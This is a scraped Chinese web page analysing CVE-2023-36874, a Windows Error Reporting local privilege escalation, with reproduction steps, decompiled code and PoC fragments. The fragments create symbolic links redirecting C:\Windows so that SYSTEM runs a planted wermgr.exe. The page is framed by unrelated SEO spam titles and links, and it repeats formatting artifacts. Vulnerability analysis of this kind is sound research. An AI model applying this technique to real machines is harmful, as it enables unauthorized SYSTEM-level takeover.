当前位置: 首页 > news >正文

网上做网站的公司都是怎么做的网站开发的论文引言

网上做网站的公司都是怎么做的,网站开发的论文引言,做网站建设业务员好吗,网站免费正能量直接进入老狼CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析 漏洞简介 Windows错误报告服务在提交错误报告前会创建wermgr.exe进程#xff0c;而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程#xff0c;从而以system权限执行代码。 影响版本 Windows10 1507 * Wind…CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析 漏洞简介 Windows错误报告服务在提交错误报告前会创建wermgr.exe进程而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程从而以system权限执行代码。 影响版本 Windows10 1507 * Windows10 1607 * Windows10 1809 * Windows10 21H2 * Windows10 22H2 * Windows11 21H2 * Windows11 22H2 * WindowsServer 2008 sp2 * WindowsServer 2008 r2 sp1 * x64 * WindowsServer2016 * WindowsServer2019 * WindowsServer2022 *危害等级 7.8 ∣ H I G H \textcolor{Red}{7.8 | HIGH} 7.8∣HIGH 漏洞复现 首先在C盘下创建一个目录test\system32然后将自己写的exe改名为wermgr.exe放进去这里我是直接使用poc里面添加账户的exe改名为wermgr.exe。 运行EXP之前可以查看当前用户信息 运行EXP后 漏洞分析 【EXP】https://github.com/Wh04m1001/CVE-2023-36874 根据网上给出的POC可以大致知道执行的流程 创建目录C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport。 CreateDirectory(LC:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\MyReport, NULL);从资源中释放错误报告文件MyReport.wer。 HRSRC res FindResource(hm, MAKEINTRESOURCE(IDR_REPORT1), LReport); DWORD ReportSize SizeofResource(hm, res); void* ReportBuff LoadResource(hm, res); ... HANDLE hFile CreateFile(LC:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\MyReport\\Report.wer, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile INVALID_HANDLE_VALUE) {printf([-] Cannot create report.wer file.\n);return -1; } if (!WriteFile(hFile, ReportBuff, ReportSize, NULL, NULL)) {printf([-] Failed to write to report.wer file.\n);return -1; }创建IErcLuaSupportUI接口对象调用 I E r c L u a S u p p o r t : : G e t W e r S t o r e F a c t o r y ( ) \textcolor{orange}{IErcLuaSupport::GetWerStoreFactory()} IErcLuaSupport::GetWerStoreFactory()构造函数实例化IWerStoreFactory工厂对象。 result CoCreateInstance(__uuidof(CLSID_IErcLuaSupport), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IErcLuaSupport), (PVOID*)pIErcLuaSupport); ... result pIErcLuaSupport-Proc3(pIWerStoreFactory);调用 I W e r S t o r e F a c t o r y : : E n u m e r a t e S t a r t ( ) \textcolor{orange}{IWerStoreFactory::EnumerateStart()} IWerStoreFactory::EnumerateStart()得到IWerStore接口对象。 result pIWerStoreFactory-Proc4(pIWerStore);使用 I W e r C o m S t o r e : : E n u m e r a t e S t a r t ( ) \textcolor{orange}{IWerComStore::EnumerateStart()} IWerComStore::EnumerateStart()开始模拟错误报告。 result pIWerStore-Proc3();调用 I W e r C o m S t o r e : : L o a d R e p o r t ( ) \textcolor{orange}{IWerComStore::LoadReport()} IWerComStore::LoadReport()加载C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport目录下的错误报告并获得一个错误报告接口IWerReport的对象。 BSTR report SysAllocString(LMyReport); BSTR data SysAllocString(Ltest); result pIWerStore-Proc6(report, pIWerReport);为C:\Windows目录创建一个符号链接指向一个目录C:\test。 pRtlInitUnicodeString(object, L\\??\\test); InitializeObjectAttributes(objAttrDir, object, OBJ_CASE_INSENSITIVE, NULL, NULL); pNtCreateDirectoryObject(hObjectdir, 0xF000F, objAttrDir);pRtlInitUnicodeString(symlink_name, LWindows); pRtlInitUnicodeString(path, L\\GLOBAL??\\C:\\test); InitializeObjectAttributes(objAttrLink, symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL); pNtCreateSymbolicLinkObject(hSymlinkWindows, 0xF0001, objAttrLink, path);为ProgramData目录创建一个符号链接指向目录C:\ProgramData pRtlInitUnicodeString(symlink_name, LProgramData); pRtlInitUnicodeString(path, L\\GLOBAL??\\C:\\Programdata); InitializeObjectAttributes(objAttrLink, symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL); pNtCreateSymbolicLinkObject(hSymlinkProgramdata, 0xF0001, objAttrLink, path);为C:\目录创建一个符号链接指向C:\test目录 pRtlInitUnicodeString(symlink_name, L\\??\\C:); pRtlInitUnicodeString(path, L\\??\\test); InitializeObjectAttributes(objAttrLink, symlink_name, OBJ_CASE_INSENSITIVE, NULL, NULL); pNtCreateSymbolicLinkObject(hSymlink, 0xF0001, objAttrLink, path);调用 I W e r C o m R e p o r t : : _ S u b m i t R e p o r t ( ) \textcolor{orange}{IWerComReport::\_SubmitReport()} IWerComReport::_SubmitReport()重点来了。该接口内部会调用 w e r ! W e r p S u b m i t R e p o r t F r o m S t o r e \textcolor{orange}{wer!WerpSubmitReportFromStore} wer!WerpSubmitReportFromStore提交错误报告然后经历 C R e p o r t H a n d l e I n s t a n c e : : S u b m i t R e p o r t C R e p o r t M a n a g e r : : R e p o r t P r o b l e m C R e p o r t M a n a g e r : : R e p o r t P r o b l e m O u t O f P r o c e s s U t i l L a u n c h W e r M a n a g e r \textcolor{orange}{CReportHandleInstance::SubmitReport\ \ CReportManager::ReportProblem\ \ CReportManager::ReportProblemOutOfProcess\ \ UtilLaunchWerManager } CReportHandleInstance::SubmitReport  CReportManager::ReportProblem  CReportManager::ReportProblemOutOfProcess  UtilLaunchWerManager到达利用点。 __int64 __fastcall UtilLaunchWerManager(const unsigned __int16 **a1,__int64 a2,__int64 a3,void *a4,void **a5,void **a6,unsigned int a7,void **a8) {if ( GetSystemDirectoryW(Buffer, 0x104u) - 1 0x102 ) // 取 C:\Windows\System32 目录{LastError GetLastError();v27 ERROR_HR_FROM_WIN32(LastError);v12 v27;v28 WPP_GLOBAL_Control;if ( WPP_GLOBAL_Control (HKEY)WPP_GLOBAL_Control || ((_BYTE)WPP_GLOBAL_Control[7] 1) 0 )goto LABEL_38;v29 0x12i64;goto LABEL_67;}v11 StringCchCatW(Buffer, 0x104ui64, L\\wermgr.exe); // 拼接成 C:\Windows\System32\wermgr.exev12 v11;if ( v11 0 ){...if ( !InitializeProcThreadAttributeList(0i64, 1u, 0, Size) ){...}ProcessHeap GetProcessHeap();ThreadAttributeHeap (struct _PROC_THREAD_ATTRIBUTE_LIST *)HeapAlloc(ProcessHeap, 0, Size);v10 ThreadAttributeHeap;if ( !ThreadAttributeHeap ){...goto LABEL_37;}if ( !InitializeProcThreadAttributeList(ThreadAttributeHeap, 1u, 0, Size) ){...goto LABEL_53;}v9 1;if ( UpdateProcThreadAttribute(v10, 0, 0x20002ui64, lpValue, 8i64 * a7, 0i64, 0i64) ){StartupInfo.cb 0x70;v45 v10;// 创建进程路径为 C:\windows\system32\wermgr.exeif ( CreateProcessW(Buffer, v14, 0i64, 0i64, 2, 0x80000u, 0i64, 0i64, StartupInfo, lpProcessInformation) ){v12 0;}...}} }注意 C r e a t e P r o c e s s W \textcolor{cornflowerblue}{CreateProcessW} CreateProcessW函数的bInheritHandles参数大于0表明新进程会继承父进程的句柄也就是说子进程和父进程的句柄值是一样的。同时表明父进程句柄的所有权限子进程同样也有。而错误报告服务运行系统服务中对应进程名svchost.exe权限是system。假如能够通过某种方式欺骗服务创建攻击者指定的进程那自然就可以提权了。 漏洞利用 显然从公开的POC中可以看到利用的方式是在C盘创建一个test目录在test里又创建一个system32目录然后把伪造的wermgr.exe放进去。在调用 I W e r C o m R e p o r t : : _ S u b m i t R e p o r t ( ) \textcolor{orange}{IWerComReport::\_SubmitReport()} IWerComReport::_SubmitReport()前给windows目录创建一个符号链接指向test这样就可以在系统服务创建C:\Windows\system32\wermgr.exe进程的时候欺骗系统创建C:\test\system32\wermgr.exe进程从而以system权限执行任意代码。
http://www.sadfv.cn/news/307634/

相关文章:

  • 建站之星网站建设下载版wordpress add option
  • 检测网站是否做了301wordpress 发视频
  • 怎么用linux做网站服务器如何用ps做网站首页的图片
  • 公司门户网站设计wordpress 抽奖插件
  • 重庆网站建设公司wordpress 登陆后访问
  • 南宁建站方案wordpress 企业站主题
  • 开发 网站 沈阳新站网站如何做Seo
  • 做网站用哪些语言2022永久免费的看电视软件
  • 十堰网站建设多少钱网站建设工作情况报告
  • 安丘网站建设报价品牌设计的原则有哪些
  • 如何用asp做网站想开个影视网站 那有做的
  • 模板建站多少钱wordpress网址导航页面
  • 仿新浪首页网站模板宁波公司网站开发
  • 做生鲜食品最好的网站佛山网站建设科技有限公司
  • 海南省网站设计公司网址接入服务商网站备案管理系统技术规范要求
  • 做3D打印样品用什么外贸网站好湖州做网站的
  • 网站建设策划书格式及范文环保网站建设说明
  • 空间除了可以做网站还能干什么昌平网站制作公司
  • 营销型网站建设哪里有网站做301跳转的方法
  • 东莞网站制作公司淮南做网站推广
  • 福田皇岗社区做网站网站设计重要性
  • 北京网站开发建设wordpress导航调用分类
  • 俄语网站建设公司官方网站建设案例
  • 10个奇怪又有趣的网站如何让网站不被收录
  • 百度 网站质量如何用word做简单的网站
  • 工商网站官网查询wordpress 整站迁移
  • 珠海舒讯网站建设格子商铺wordpress模板
  • 网站开发 开源亚马逊中文官网
  • 婚纱摄影建设网站的目的服务器wordpress
  • 网站开发有什么软件南宁网站开发gxjzdrj